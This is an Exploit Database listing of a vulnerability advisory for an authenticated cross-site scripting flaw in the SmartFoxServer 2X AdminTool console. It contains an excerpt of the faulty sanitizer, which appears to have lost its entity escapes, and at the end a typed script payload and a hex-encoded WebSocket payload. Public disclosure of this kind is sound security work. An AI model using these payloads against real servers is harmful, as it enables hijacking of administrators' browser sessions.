SmartFoxServer 2X 2.17.0 – God Mode Console WebSocket XSS

• Exploit Database
• 17 阅读

• 作者： LiquidWorm
  日期： 2021-02-08
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/49528/

• # Exploit Title: SmartFoxServer 2X 2.17.0 - God Mode Console WebSocket XSS
  # Date: 29.01.2021
  # Exploit Author: LiquidWorm
  # Vendor Homepage: https://www.smartfoxserver.com
  
  Vendor: gotoAndPlay()
  Product web page: https://www.smartfoxserver.com
  Affected version: Server: 2.17.0
  Remote Admin: 3.2.6
  SmartFoxServer 2X, Pro, Basic
  
  Summary: SmartFoxServer (SFS) is a comprehensive SDK for
  rapidly developing multiplayer games and applications
  with Adobe Flash/Flex/Air, Unity, HTML5, iOS, Universal
  Windows Platform, Android, Java, C++ and more. SmartFoxServer
  comes with a rich set of features, an impressive
  documentation set, tens of examples with their source,
  powerful administration tools and a very active support
  forum. Born in 2004, and evolving continuously since
  then, today SmartFoxServer is the leading middleware to
  create large scale multiplayer games, MMOs and virtual
  communities. Thanks to its simplicity of use, versatility
  and performance, it currently powers hundreds of projects
  all over the world, from small chats and turn-based games
  to massive virtual worlds and realtime games.
  
  Desc: Authenticated Cross-Site Scripting was discovered.
  Input passed to the AdminTool console is not properly
  sanitized before being returned to the user. This can be
  exploited to execute arbitrary HTML code in a user's browser
  session in context of an affected site.
  
  -----------------------------------------------------------------
  /ConsoleModuleReqHandler.java:
  ------------------------------
  
   private String checkHTML(String data) {
   if (data.indexOf(60) > -1 && data.indexOf("<span") == -1) {
   data = data.replaceAll("\\<", "<");
   return data.replaceAll("\\>", ">");
   }
   return data;
  
  -----------------------------------------------------------------
  
  Tested on: Windows (all) 64bit installer
   Linux/Unix 64bit installer
   MacOS (10.8+) 64bit installer
   Java 1.8.0_281
   Python 3.9.1
   Python 2.7.14
  
  
  Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  @zeroscience
  
  
  Advisory ID: ZSL-2021-5626
  Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5626.php
  
  
  29.01.2021
  
  --
  
  
  Typing payload:
  <script>confirm(document.URL)
  
  WebSocket payload:
  \x80\x00\x52\x12\x00\x03\x00\x01\x63\x02\x01\x00
  \x01\x61\x03\x00\x0D\x00\x01\x70\x12\x00\x03\x00
  \x01\x63\x08\x00\x0C\x63\x6F\x6E\x73\x6F\x6C\x65
  \x2E\x68\x69\x6E\x74\x00\x01\x72\x04\xFF\xFF\xFF
  \xFF\x00\x01\x70\x12\x00\x01\x00\x01\x63\x08\x00
  \x18\x3C\x73\x63\x72\x69\x70\x74\x3E\x63\x6F\x6E
  \x66\x69\x72\x6D\x28\x64\x6F\x63\x75\x6D\x65\x6E
  \x74\x2E\x55\x52\x4C\x29